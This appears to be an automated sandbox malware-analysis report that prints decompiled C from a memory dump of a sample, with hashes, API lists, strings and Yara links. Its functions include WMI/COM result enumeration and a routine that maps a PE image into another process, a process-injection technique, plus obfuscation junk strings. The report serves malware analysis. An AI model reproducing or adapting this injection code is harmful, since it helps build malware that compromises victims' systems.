Opcode Fuzzy Hash: 16cc313f8e8dd8e01c834c7027579ed332eabe3692db8f012cd00867c2809fb7
Instruction Fuzzy Hash: E7A1E274A4022CEFDB75CB14CD85BE8B7B1EB09305F1090D6EA49B6290D7B09AD2DF91

Uniqueness

Uniqueness Score: -1.00%

Function 00ED68F2, Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 388
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E00ED68F2(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				void* _v32;
				void* _v36;
				signed int _v40;
				intOrPtr* _v44;
				char _v48;
				char _v52;
				char _v56;
				signed int _v60;
				intOrPtr _v64;
				short _v72;
				signed int _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t176;
				char _t182;
				signed int _t189;
				intOrPtr* _t193;
				signed int _t194;
				signed int _t199;
				intOrPtr* _t200;
				signed int _t202;
				intOrPtr* _t207;
				signed int _t208;
				signed int _t211;
				intOrPtr* _t212;
				intOrPtr _t221;
				char _t227;
				signed int _t229;
				intOrPtr* _t230;
				intOrPtr _t232;
				intOrPtr* _t233;
				signed int _t234;
				signed int _t237;
				intOrPtr _t238;
				signed int _t240;
				intOrPtr _t253;
				intOrPtr _t255;
				intOrPtr _t256;
				char* _t258;
				intOrPtr* _t259;
				intOrPtr* _t264;
				intOrPtr _t266;
				void* _t269;
				void* _t291;
				intOrPtr _t295;
				intOrPtr _t296;
				intOrPtr _t313;
				intOrPtr _t314;
				void* _t333;
				signed int _t335;
				void* _t336;
				intOrPtr* _t339;
				intOrPtr* _t340;
				intOrPtr* _t341;
				intOrPtr* _t343;
				intOrPtr* _t347;
				intOrPtr* _t348;

				_t333 = 0;
				_v36 = 0;
				_v40 = 0;
				_t264 = E00ED6E91(__ecx, 0, _a4);
				_v88 = _t264;
				if(_t264 != 0) {
					_t176 = E00ECD239(0x10);
					_pop(_t269);
					_v24 = _t176;
					__eflags = _t176;
					if(_t176 == 0) {
						L53:
						E00ECD1EA( &_v40, 0xfffffffe);
						E00ED6F45( &_v88);
						return _v24;
					}
					_v20 = E00ED3A82(_t269, 0x117);
					 *_t347 = 0x79f;
					_t182 = E00ED3A82(_t269);
					_push(0);
					_push(_a8);
					_v56 = _t182;
					_push(_t182);
					_push(_a12);
					_v40 = E00ECE9D2(_v20);
					E00ED0299( &_v20);
					E00ED0299( &_v56);
					_t348 = _t347 + 0x20;
					__eflags = _v40;
					if(_v40 != 0) {
						_t339 = __imp__#2;
						_v64 =  *_t339(_v40);
						_t189 = E00ED3A82(_t269, 0x1cd);
						_v20 = _t189;
						_v56 =  *_t339(_t189);
						E00ED0299( &_v20);
						_t193 =  *_t264;
						_t194 =  *((intOrPtr*)( *_t193 + 0x50))(_t193, _v56, _v64, 0, 0,  &_v36);
						__eflags = _t194;
						if(_t194 != 0) {
							L52:
							_t340 = __imp__#6;
							 *_t340(_v64);
							 *_t340(_v56);
							goto L53;
						}
						_v32 = 0;
						_v20 = 0;
						while(1) {
							__eflags = _v36 - _t333;
							if(_v36 == _t333) {
								break;
							}
							_t199 =  *((intOrPtr*)( *_v36 + 0x10))(_v36, 0xea60, 1,  &_v32,  &_v84);
							__eflags = _t199;
							if(_t199 != 0) {
								L48:
								_t200 = _v36;
								 *((intOrPtr*)( *_t200 + 8))(_t200);
								_t202 = _v20;
								__eflags = _t202 - _t333;
								if(_t202 <= _t333) {
									E00ECD1EA( &_v24, _t333);
								} else {
									_t341 = _v24;
									 *((intOrPtr*)(_t341 + 8)) = _t202;
									 *_t341 = E00ECEC9D(_a4);
									 *((intOrPtr*)(_t341 + 4)) = E00ECEC9D(_a8);
								}
								goto L52;
							}
							_v16 = _t333;
							_v48 = _t333;
							_v12 = _t333;
							_v28 = _t333;
							__eflags = _v84 - _t333;
							if(_v84 == _t333) {
								goto L48;
							}
							_t207 = _v32;
							_t208 =  *((intOrPtr*)( *_t207 + 0x1c))(_t207, _t333, 0x40, _t333,  &_v28);
							__eflags = _t208;
							if(_t208 >= 0) {
								__imp__#20(_v28, 1,  &_v16);
								__imp__#19(_v28, 1,  &_v48);
								_t335 = _v20 << 3;
								_t343 = _v24 + 0xc;
								_t48 = _t335 + 8; // 0xec8e61
								_v60 = _t335;
								_v44 = _t343;
								_t211 = E00ECD07F(_t48, _t343, _t335);
								__eflags = _t211;
								if(_t211 == 0) {
									L47:
									__imp__#16(_v28);
									_t212 = _v32;
									 *((intOrPtr*)( *_t212 + 8))(_t212);
									_t333 = 0;
									__eflags = 0;
									goto L48;
								}
								 *(_t335 +  *_t343) = _v48 - _v16 + 1;
								 *((intOrPtr*)(_t335 +  *_t343 + 4)) = E00ECD239( *(_t335 +  *_t343) << 3);
								_t221 =  *_t343;
								_t266 = 0;
								__eflags =  *(_t335 + _t221 + 4);
								if( *(_t335 + _t221 + 4) == 0) {
									__eflags = _v24 + 0xc;
									E00ECD1EA(_v24 + 0xc, 0);
									E00ECD1EA( &_v24, 0);
									goto L47;
								}
								_t227 = _v16;
								_v12 = _t227;
								while(1) {
									__eflags = _t227 - _v48;
									if(_t227 > _v48) {
										break;
									}
									_t229 =  &_v12;
									_v52 = _t266;
									__imp__#25(_v28, _t229,  &_v52);
									__eflags = _t229;
									if(_t229 < 0) {
										break;
									}
									_t232 = E00ECEC9D(_v52);
									_t67 =  *_t343 + 4; // 0x3d8b0000
									 *((intOrPtr*)( *((intOrPtr*)(_t335 + _t67)) + (_v12 - _v16) * 8)) = _t232;
									_t233 = _v32;
									_t290 =  *_t233;
									_t234 =  *((intOrPtr*)( *_t233 + 0x10))(_t233, _v52, _t266,  &_v80, _t266, _t266);
									__eflags = _t234;
									if(_t234 < 0) {
										L40:
										__imp__#6(_v52);
										_t146 =  &_v12;
										 *_t146 = _v12 + 1;
										__eflags =  *_t146;
										_t227 = _v12;
										continue;
									}
									_v92 = E00ED3A82(_t290, 0x926);
									 *_t348 = 0x1ac;
									_v100 = E00ED3A82(_t290);
									_t237 = _v80 & 0x0000ffff;
									_pop(_t291);
									__eflags = _t237 - 0xb;
									if(__eflags > 0) {
										__eflags = _t237 - 0x10;
										if(_t237 == 0x10) {
											L35:
											_t238 = E00ECD239(0x18);
											_t121 =  *_t343 + 4; // 0x3d8b0000
											 *((intOrPtr*)( *((intOrPtr*)(_t335 + _t121)) + 4 + (_v12 - _v16) * 8)) = _t238;
											_t295 =  *_t343;
											_t240 = _v12 - _v16;
											_t130 = _t295 + 4; // 0x3d8b0000
											_t296 =  *((intOrPtr*)(_t335 + _t130));
											__eflags =  *((intOrPtr*)(_t296 + 4 + _t240 * 8)) - _t266;
											if( *((intOrPtr*)(_t296 + 4 + _t240 * 8)) == _t266) {
												L39:
												E00ED0299( &_v92);
												E00ED0299( &_v100);
												__imp__#9( &_v80);
												goto L40;
											}
											_push(_v72);
											_push(L"%d");
											L37:
											_t136 =  *_t343 + 4; // 0x3d8b0000
											_t336 = 0xc;
											E00ECE17D(_t336,  *((intOrPtr*)( *((intOrPtr*)(_t335 + _t136)) + 4 + _t240 * 8)));
											L38:
											_t335 = _v60;
											_t343 = _v44;
											_t266 = 0;
											__eflags = 0;
											goto L39;
										}
										__eflags = _t237 + 0xffffffef - 2;
										if(_t237 + 0xffffffef > 2) {
											L32:
											__eflags = _v80 & 0x00002000;
											if((_v80 & 0x00002000) == 0) {
												_v96 = E00ED3A82(_t291, 0xcd0);
												E00ECE17D(0x100,  &_v616, _t248, _v80 & 0x0000ffff);
												E00ED0299( &_v96);
												_t253 = E00ECEC9D( &_v616);
												_t348 = _t348 + 0x14;
												 *((intOrPtr*)( *((intOrPtr*)(_v60 +  *_v44 + 4)) + 4 + (_v12 - _v16) * 8)) = _t253;
												goto L38;
											}
											_t255 = E00ED6D6C( &_v80);
											L27:
											_t82 =  *_t343 + 4; // 0x3d8b0000
											 *((intOrPtr*)( *((intOrPtr*)(_t335 + _t82)) + 4 + (_v12 - _v16) * 8)) = _t255;
											goto L39;
										}
										_t256 = E00ECD239(0x18);
										_t89 =  *_t343 + 4; // 0x3d8b0000
										 *((intOrPtr*)( *((intOrPtr*)(_t335 + _t89)) + 4 + (_v12 - _v16) * 8)) = _t256;
										_t313 =  *_t343;
										_t240 = _v12 - _v16;
										_t98 = _t313 + 4; // 0x3d8b0000
										_t314 =  *((intOrPtr*)(_t335 + _t98));
										__eflags =  *((intOrPtr*)(_t314 + 4 + _t240 * 8)) - _t266;
										if( *((intOrPtr*)(_t314 + 4 + _t240 * 8)) == _t266) {
											goto L39;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									if(__eflags == 0) {
										__eflags = _v72 - 0xffff;
										_t258 = L"TRUE";
										if(_v72 != 0xffff) {
											_t258 = L"FALSE";
										}
										_push(_t258);
										L26:
										_t255 = E00ECEC9D();
										goto L27;
									}
									__eflags = _t237 - 1;
									if(__eflags == 0) {
										goto L39;
									}
									if(__eflags <= 0) {
										goto L32;
									}
									__eflags = _t237 - 3;
									if(_t237 <= 3) {
										goto L35;
									}
									__eflags = _t237 - 8;
									if(_t237 != 8) {
										goto L32;
									}
									_push(_v72);
									goto L26;
								}
								__imp__#16(_v28);
								_t230 = _v32;
								 *((intOrPtr*)( *_t230 + 8))(_t230);
								_t333 = 0;
								__eflags = 0;
								L43:
								_t153 =  &_v20;
								 *_t153 = _v20 + 1;
								__eflags =  *_t153;
								continue;
							}
							_t259 = _v32;
							 *((intOrPtr*)( *_t259 + 8))(_t259);
							goto L43;
						}
						goto L48;
					}
					E00ECD1EA( &_v24, 0);
					goto L53;
				}
				return 0;
			}

0x00ed6901
0x00ed6903
0x00ed6906
0x00ed690e
0x00ed6911
0x00ed6916
0x00ed6921
0x00ed6926
0x00ed6927
0x00ed692a
0x00ed692c
0x00ed6d4f
0x00ed6d55
0x00ed6d5f
0x00000000
0x00ed6d64
0x00ed693c
0x00ed693f
0x00ed6946
0x00ed694b
0x00ed694c
0x00ed694f
0x00ed6952
0x00ed6953
0x00ed695e
0x00ed6965
0x00ed696e
0x00ed6973
0x00ed6976
0x00ed6979
0x00ed698f
0x00ed699c
0x00ed699f
0x00ed69a6
0x00ed69ab
0x00ed69b2
0x00ed69b7
0x00ed69c9
0x00ed69cc
0x00ed69ce
0x00ed6d3f
0x00ed6d42
0x00ed6d48
0x00ed6d4d
0x00000000
0x00ed6d4d
0x00ed69d4
0x00ed69d7
0x00ed6ccd
0x00ed6ccd
0x00ed6cd0
0x00000000
0x00000000
0x00ed69f6
0x00ed69f9
0x00ed69fb
0x00ed6d06
0x00ed6d06
0x00ed6d0c
0x00ed6d0f
0x00ed6d12
0x00ed6d14
0x00ed6d38
0x00ed6d16
0x00ed6d16
0x00ed6d1c
0x00ed6d27
0x00ed6d2e
0x00ed6d2e
0x00000000
0x00ed6d3e
0x00ed6a01
0x00ed6a04
0x00ed6a07
0x00ed6a0a
0x00ed6a0d
0x00ed6a10
0x00000000
0x00000000
0x00ed6a16
0x00ed6a24
0x00ed6a27
0x00ed6a29
0x00ed6a42
0x00ed6a51
0x00ed6a5d
0x00ed6a60
0x00ed6a63
0x00ed6a67
0x00ed6a6a
0x00ed6a6d
0x00ed6a73
0x00ed6a75
0x00ed6cf2
0x00ed6cf5
0x00ed6cfb
0x00ed6d01
0x00ed6d04
0x00ed6d04
0x00000000
0x00ed6d04
0x00ed6a84
0x00ed6a98
0x00ed6a9c
0x00ed6a9e
0x00ed6aa0
0x00ed6aa4
0x00ed6cdb
0x00ed6ce0
0x00ed6cea
0x00000000
0x00ed6cef
0x00ed6aaa
0x00ed6aad
0x00ed6cad
0x00ed6cad
0x00ed6cb0
0x00000000
0x00000000
0x00ed6ab9
0x00ed6ac0
0x00ed6ac3
0x00ed6ac9
0x00ed6acb
0x00000000
0x00000000
0x00ed6ad4
0x00ed6adb
0x00ed6ae7
0x00ed6aea
0x00ed6aed
0x00ed6af9
0x00ed6afc
0x00ed6afe
0x00ed6c9e
0x00ed6ca1
0x00ed6ca7
0x00ed6ca7
0x00ed6ca7
0x00ed6caa
0x00000000
0x00ed6caa
0x00ed6b0e
0x00ed6b11
0x00ed6b1d
0x00ed6b20
0x00ed6b24
0x00ed6b25
0x00ed6b28
0x00ed6b7f
0x00ed6b82
0x00ed6c30
0x00ed6c32
0x00ed6c39
0x00ed6c44
0x00ed6c4b
0x00ed6c4d
0x00ed6c50
0x00ed6c50
0x00ed6c54
0x00ed6c58
0x00ed6c80
0x00ed6c84
0x00ed6c8d
0x00ed6c98
0x00000000
0x00ed6c98
0x00ed6c5e
0x00ed6c5f
0x00ed6c64
0x00ed6c66
0x00ed6c70
0x00ed6c71
0x00ed6c78
0x00ed6c78
0x00ed6c7b
0x00ed6c7e
0x00ed6c7e
0x00000000
0x00ed6c7e
0x00ed6b8b
0x00ed6b8e
0x00ed6bcd
0x00ed6bcd
0x00ed6bd4
0x00ed6bfc
0x00ed6bff
0x00ed6c08
0x00ed6c10
0x00ed6c24
0x00ed6c2a
0x00000000
0x00ed6c2a
0x00ed6bda
0x00ed6b69
0x00ed6b6b
0x00ed6b76
0x00000000
0x00ed6b76
0x00ed6b92
0x00ed6b99
0x00ed6ba4
0x00ed6bab
0x00ed6bad
0x00ed6bb0
0x00ed6bb0
0x00ed6bb4
0x00ed6bb8
0x00000000
0x00000000
0x00ed6bc2
0x00ed6bc3
0x00000000
0x00ed6bc3
0x00ed6b2a
0x00ed6b52
0x00ed6b57
0x00ed6b5c
0x00ed6b5e
0x00ed6b5e
0x00ed6b63
0x00ed6b64
0x00ed6b64
0x00000000
0x00ed6b64
0x00ed6b2c
0x00ed6b2f
0x00000000
0x00000000
0x00ed6b35
0x00000000
0x00000000
0x00ed6b3b
0x00ed6b3e
0x00000000
0x00000000
0x00ed6b44
0x00ed6b47
0x00000000
0x00000000
0x00ed6b4d
0x00000000
0x00ed6b4d
0x00ed6cb9
0x00ed6cbf
0x00ed6cc5
0x00ed6cc8
0x00ed6cc8
0x00ed6cca
0x00ed6cca
0x00ed6cca
0x00ed6cca
0x00000000
0x00ed6cca
0x00ed6a2b
0x00ed6a31
0x00000000
0x00ed6a31
0x00000000
0x00ed6cd6
0x00ed6980
0x00000000
0x00ed6986
0x00000000

Strings

FALSE, xrefs: 00ED6B5E, 00ED6B63
TRUE, xrefs: 00ED6B57

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: Initialize$AllocBlanketCreateInstanceProxySecurityString
String ID: FALSE$TRUE
API String ID: 3531828250-1412513891
Opcode ID: 4fa1db16689053f99fcc5e1e713bb14a73f3454fccff18fcc2266f4ba5650402
Instruction ID: 608a61c42b9a79e85df07bfde88daa1085f449a1892c8561ce16131ee91ec68a
Opcode Fuzzy Hash: 4fa1db16689053f99fcc5e1e713bb14a73f3454fccff18fcc2266f4ba5650402
Instruction Fuzzy Hash: F1E12771E00209AFCB14EFE8D989DAEBBB9FF48310F24551AE551BB251DB31A942CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00ECD446, Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 227
registryCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00ECD446(intOrPtr _a4, void* _a8) {
				char _v8;
				struct HINSTANCE__* _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr* _v32;
				struct HINSTANCE__* _v40;
				char _v44;
				char _v56;
				char _v72;
				struct _WNDCLASSEXA _v120;
				void* __esi;
				intOrPtr _t76;
				void* _t78;
				intOrPtr* _t82;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t93;
				intOrPtr _t102;
				intOrPtr _t106;
				char _t108;
				intOrPtr _t109;
				intOrPtr _t112;
				intOrPtr _t116;
				void* _t121;
				struct HWND__* _t126;
				void* _t134;
				void* _t142;
				intOrPtr _t146;
				intOrPtr _t147;
				void* _t152;

				_t76 =  *0xef56a8; // 0xf00000
				_v16 = 0;
				_v44 = 0;
				_v40 = 0;
				_v12 = 0;
				_v8 = 0;
				_v24 = 0;
				if(( *(_t76 + 0x1898) & 0x00000040) != 0) {
					E00ED7023(0x1f4);
					_pop(_t134);
				}
				_v28 = 0;
				_v20 = E00ED3A82(_t134, 0xa8c);
				_t78 = E00ED0B5E(_t77);
				_push( &_v20);
				if(_t78 == 0) {
					E00ED0299();
					_t82 =  *((intOrPtr*)(_a8 + 0x3c)) + _a8;
					_v32 = _t82;
					if( *_t82 != 0x4550) {
						L17:
						if(_v8 != 0) {
							_t88 =  *0xef5748; // 0x0
							 *((intOrPtr*)(_t88 + 0x10))(_a4, _v8);
							_v8 = 0;
						}
						L19:
						if(_v12 != 0) {
							_t147 =  *0xef5748; // 0x0
							 *((intOrPtr*)(_t147 + 0x10))(GetCurrentProcess(), _v12);
						}
						if(_v16 != 0) {
							_t84 =  *0xef5748; // 0x0
							 *((intOrPtr*)(_t84 + 0x20))(_v16);
						}
						return _v8;
					}
					_push(0);
					_push(0x8000000);
					_v44 =  *((intOrPtr*)(_t82 + 0x50));
					_push(0x40);
					_push( &_v44);
					_push(0);
					_push(0xe);
					_push( &_v16);
					_t93 =  *0xef5748; // 0x0
					if( *((intOrPtr*)(_t93 + 0xc))() < 0) {
						goto L17;
					}
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsb");
					asm("movsd");
					asm("movsd");
					_v120.lpszClassName =  &_v56;
					asm("movsw");
					_v120.lpfnWndProc = DefWindowProcA;
					asm("movsb");
					_v120.cbWndExtra = 0;
					_v120.style = 0xb;
					_v120.lpszMenuName = 0;
					_v120.cbSize = 0x30;
					_v120.cbClsExtra = 0;
					_v120.hInstance = 0;
					if(RegisterClassExA( &_v120) != 0) {
						_t126 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0);
						if(_t126 != 0) {
							DestroyWindow(_t126);
							UnregisterClassA( &_v56, 0);
						}
					}
					_push(0x40);
					_push(0);
					_push(2);
					_push( &_v24);
					_push(0);
					_push(0);
					_push(0);
					_push( &_v12);
					_push(GetCurrentProcess());
					_push(_v16);
					_t102 =  *0xef5748; // 0x0
					if( *((intOrPtr*)(_t102 + 0x14))() < 0) {
						goto L17;
					} else {
						_push(0x40);
						_push(0);
						_push(2);
						_push( &_v24);
						_push(0);
						_push(0);
						_push(0);
						_push( &_v8);
						_push(_a4);
						_t106 =  *0xef5748; // 0x0
						_push(_v16);
						if( *((intOrPtr*)(_t106 + 0x14))() < 0) {
							goto L17;
						}
						_t108 = E00ECD19C( *0xef56a8, 0x1ac4);
						_v20 = _t108;
						if(_t108 == 0) {
							goto L17;
						}
						 *((intOrPtr*)(_t108 + 0x224)) = _v8;
						_t109 =  *0xef56c8; // 0x520f6c8
						_t146 =  *((intOrPtr*)(_t109 + 0x54))(_a4, 0, 0x1ac4, 0x1000, 4);
						_t112 =  *0xef56c8; // 0x520f6c8
						 *((intOrPtr*)(_t112 + 0x20))(_a4, _t146, _v20, 0x1ac4,  &_v28);
						E00ECD1EA( &_v20, 0x1ac4);
						_t116 =  *0xef56a8; // 0xf00000
						_v20 = _t116;
						 *0xef56a8 = _t146;
						memcpy(_v12, _a8,  *(_v32 + 0x50));
						E00ECD3D0(_v8, _v8, _v12, _a8);
						_t121 = E00ECFE78("237");
						_t152 = 0xf;
						if(_t121 <= _t152) {
							_t152 = _t121;
						}
						_t142 = 0;
						if(_t152 <= 0) {
							L16:
							 *0xef56a8 = _v20;
							goto L19;
						} else {
							do {
								_t142 = _t142 + 1;
							} while (_t142 < _t152);
							goto L16;
						}
					}
				}
				E00ED0299();
				return 0;
			}

0x00ecd44c
0x00ecd455
0x00ecd458
0x00ecd45b
0x00ecd45e
0x00ecd461
0x00ecd464
0x00ecd46f
0x00ecd476
0x00ecd47b
0x00ecd47b
0x00ecd481
0x00ecd48a
0x00ecd48d
0x00ecd499
0x00ecd49a
0x00ecd4a9
0x00ecd4b5
0x00ecd4bd
0x00ecd4c0
0x00ecd67e
0x00ecd681
0x00ecd686
0x00ecd68e
0x00ecd691
0x00ecd691
0x00ecd694
0x00ecd697
0x00ecd69c
0x00ecd6a9
0x00ecd6a9
0x00ecd6af
0x00ecd6b4
0x00ecd6b9
0x00ecd6b9
0x00000000
0x00ecd6bc
0x00ecd4c9
0x00ecd4ca
0x00ecd4cf
0x00ecd4d2
0x00ecd4d7
0x00ecd4d8
0x00ecd4d9
0x00ecd4de
0x00ecd4df
0x00ecd4e9
0x00000000
0x00000000
0x00ecd4f7
0x00ecd4f8
0x00ecd4f9
0x00ecd4fa
0x00ecd503
0x00ecd504
0x00ecd508
0x00ecd510
0x00ecd512
0x00ecd519
0x00ecd51a
0x00ecd51d
0x00ecd524
0x00ecd527
0x00ecd52e
0x00ecd531
0x00ecd53d
0x00ecd55f
0x00ecd567
0x00ecd56a
0x00ecd575
0x00ecd575
0x00ecd567
0x00ecd57b
0x00ecd57d
0x00ecd57e
0x00ecd583
0x00ecd584
0x00ecd585
0x00ecd586
0x00ecd58a
0x00ecd591
0x00ecd592
0x00ecd595
0x00ecd59f
0x00000000
0x00ecd5a5
0x00ecd5a5
0x00ecd5a7
0x00ecd5a8
0x00ecd5ad
0x00ecd5ae
0x00ecd5af
0x00ecd5b0
0x00ecd5b4
0x00ecd5b5
0x00ecd5b8
0x00ecd5bd
0x00ecd5c5
0x00000000
0x00000000
0x00ecd5d7
0x00ecd5de
0x00ecd5e3
0x00000000
0x00000000
0x00ecd5f8
0x00ecd5fe
0x00ecd606
0x00ecd60c
0x00ecd619
0x00ecd621
0x00ecd626
0x00ecd62b
0x00ecd631
0x00ecd640
0x00ecd64e
0x00ecd658
0x00ecd662
0x00ecd665
0x00ecd667
0x00ecd667
0x00ecd669
0x00ecd66d
0x00ecd674
0x00ecd677
0x00000000
0x00ecd66f
0x00ecd66f
0x00ecd66f
0x00ecd670
0x00000000
0x00ecd66f
0x00ecd66d
0x00ecd59f
0x00ecd49c
0x00000000

APIs

RegisterClassExA.USER32(?), ref: 00ECD534
CreateWindowExA.USER32 ref: 00ECD55F
DestroyWindow.USER32(00000000), ref: 00ECD56A
UnregisterClassA.USER32 ref: 00ECD575
GetCurrentProcess.KERNEL32(00EC148F,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 00ECD58B
memcpy.MSVCRT ref: 00ECD640
GetCurrentProcess.KERNEL32(00EC148F,00000000), ref: 00ECD6A2

Strings

0, xrefs: 00ECD527
cdcdwqwqwq, xrefs: 00ECD4FB
237, xrefs: 00ECD653
sadccdcdsasa, xrefs: 00ECD4EF

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: ClassCurrentProcessWindow$CreateDestroyRegisterUnregistermemcpy
String ID: 0$237$cdcdwqwqwq$sadccdcdsasa
API String ID: 3040207322-782192524
Opcode ID: 9e477146ce17e8af9f40934f73e5dfcbbb84b11e1c85e3e6fc5384429443b36a
Instruction ID: a4a3aea9583394c57354dbf1c7a22c29186685084180802620df47ab1e78831d
Opcode Fuzzy Hash: 9e477146ce17e8af9f40934f73e5dfcbbb84b11e1c85e3e6fc5384429443b36a
Instruction Fuzzy Hash: 87815AB2900209AFDB00DFA5DD84EAEBBB8FB08354F11506AF605FB251D7729A45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00EC67DF, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 179
windowthreadCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00EC67DF(void* __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
				short _v76;
				char _v77;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v108;
				intOrPtr _v112;
				signed int _v116;
				intOrPtr _v120;
				int _v124;
				void* __esi;
				intOrPtr _t47;
				void* _t48;
				char _t50;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t64;
				intOrPtr _t68;
				void* _t71;
				intOrPtr _t82;
				intOrPtr _t83;
				intOrPtr _t86;
				void* _t91;
				void* _t93;
				intOrPtr _t97;
				void* _t100;
				intOrPtr _t106;
				void* _t107;
				void* _t112;
				signed int _t119;
				void* _t121;
				void* _t125;
				void* _t128;

				_t128 = __fp0;
				_t107 = __edx;
				_t91 = __ecx;
				_t121 = (_t119 & 0xfffffff8) - 0x74;
				while(1) {
					_t47 =  *0xef56c8; // 0x520f6c8
					_t48 =  *((intOrPtr*)(_t47 + 0x2c))( *0xef56f4, 0);
					if(_t48 == 0 || _t48 == 0x80) {
						break;
					}
					E00ECE0AF(_t91, _t107,  &_v116);
					_t106 =  *0xef5700; // 0x0
					_t82 =  *0xef5704; // 0x0
					_t91 = _t106 + 0xe10;
					asm("adc eax, ebx");
					_t125 = _t82 - _v112;
					if(_t125 > 0 || _t125 >= 0 && _t91 >= _v116) {
						_t68 = 0xfffffffe;
					} else {
						_t83 =  *0xef56c8; // 0x520f6c8
						_push(0);
						_push( *0xef5714);
						if( *((intOrPtr*)(_t83 + 0xc8))() == 0) {
							break;
						} else {
							BitBlt(0, 0x52, 0x18, 0x1f, 8, 0, 0x1d, 0x4a, 0x45);
							_t86 =  *0xef56c8; // 0x520f6c8
							 *((intOrPtr*)(_t86 + 0xb4))(0x3e8);
							continue;
						}
					}
					L21:
					return _t68;
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t50 =  *0xef5724; // 0x520fc50
				_v108 = _t50;
				_t52 = E00ED337F(_a4,  &_v96);
				_pop(_t93);
				_v100 = _t52;
				if(_t52 != 0) {
					_t53 = GetCurrentProcess();
					_t54 = GetCurrentThread();
					DuplicateHandle(GetCurrentProcess(), _t54, _t53, 0xef5714, 0, 0, 2);
					E00ECE0AF(_t93, _t107, 0xef5700);
					_v116 = E00EC5FF4(_t107, _t128,  &_v108, E00EC61A8);
					GetLastError();
					_t61 = E00ECFE78("eTL659CbJAv0OX,OBTUPdltDM9PaXm2f9EXhHR43fdNz n8h9rrRNUwMaHYfhU 5YBKWi 7Y,eqYseNIwPZ5 w9S7ZPpBRVRJQx.Vw3,MIM3WKAOKL,9Rw WfEwTO6Rx5kM7gnJm 31im6H3rsUytDFAFn PZli4Lhuw5w3PQIZDiCOGLttNQBJmmBxvNjTnUUvU3 3Ym97iLnfacBa9IWc4K70WRSl5q2Nvau9xIPd6SA35PBdVkyl7h 2E5qep7TDkW97bFEkXselk g5SJ. CDQ9PAHIT.5hrMZQE M1K.UetlQVt53de0dowDSkk4LeREeeWs9ECFO");
					_t97 = 0xf;
					_v120 = _t97;
					if(_t61 <= _t97) {
						_v120 = _t61;
					}
					_v77 = 0;
					_v124 = 0;
					if(_v120 > 0) {
						do {
							 *((char*)(_t121 + _v124 + 0x34)) = _v124 + 0x42;
							MultiByteToWideChar(0, 0,  &_v92, 0xffffffff,  &_v76, 0x20);
							_v124 = _v124 + 1;
						} while (_v124 < _v120);
					}
					if(_v116 >= 0) {
						_push(0);
						_push( *0xef577c);
						_t100 = 0x27;
						E00ED19A7(_t100);
						GetLastError();
						_t71 = E00ECFE78("rb lVSi4kRLkpklNxBaipecXZA.S nO,yQBuQuNt1t6tQ3EaPYQQz,PQAYpIGDBF2 K1bnOGQY1bfbUhNf0DUk1L8jKKeiP 4bn1x  XaqVCu6mNmnFHerqAUa MdRwcZZDAH4JV3DgKC2CnSE0CokyD u8, IDO.Z93.CpcYu 7pibf4EWfBA.H7vCjKmf8ESnaGWZbjV6BS0CxSEk8dT 5DtzweH.KMXsdxVoqBagEME b E9PSF8962GhUAS sKjiiGsruFzOOJZnJfpK.tgS3bI2OknGjsbXxAN6cTs21UTF gYA,Km0VNa6 25Cd03H7N A,iM,VS6SM16JO 2Sicz9HyO6VlmpW1wHTBevgwzk7Z25TuNi2O.szEpHCSqooO DRgBjzwlIuX2G05TIr8iV3 UQumx9L6e OOhTk 4o8SLgJJiKrGOc4DQWnSvgCYsfBxAwh1SFv62SNYSV4jD039L3pnJHa0KHyAJcPQNMXiGZsjOlnqpY0DPZhakYtSr7U PuQmUz5D7BJUWgCz,S 6gG50M1x9RP8iGFDW,0s6M hQggccUGHG63 oCoBFPK34SM81R6Fqr6 JQgKo KTnxXgIr2AeCtDR Zn,F6VofvI8G6xVioG8Y2 GVnnk07,KXpaZd BfC8NtDcZpWxTZ1qtNZSgF90yfR0a.7fZOnvH,B p.scbR871c 55YqtyrkxOm51f1 yJ812QQWM9GMH0Pz6E a3j8uf1 5nRZPZYSWJ4YW001duH7mlW4bPz7Rf lHi9ITs x6QZAqJ sE gnG5L3ozNHDm5gL8xob,Wbl.JGzPU Wd2Xq5n6R,PXgfhN TWJk5Ir.pIa5yk9a,EHgUc5D ocRQ91q7JQmVIXZzKyUGTm G6n1wI7p32MNyDM1zTuNH,IWNG3eiCae0OpBmGuJblKmnCwhcO IDw1");
						_t112 = 0xf;
						if(_t71 <= _t112) {
							_t112 = _t71;
						}
						_v77 = 0;
						_v124 = 0;
						if(_t112 > 0) {
							do {
								 *((char*)(_t121 + _v124 + 0x34)) = _v124 + 0x42;
								MultiByteToWideChar(0, 0,  &_v92, 0xffffffff,  &_v76, 0x20);
								_v124 = _v124 + 1;
							} while (_v124 < _t112);
						}
					}
				} else {
					_v116 = _v116 | 0xffffffff;
				}
				_t62 =  *0xef56c8; // 0x520f6c8
				 *((intOrPtr*)(_t62 + 0x30))( *0xef5714);
				_t64 =  *0xef56c8; // 0x520f6c8
				 *0xef5714 = 0;
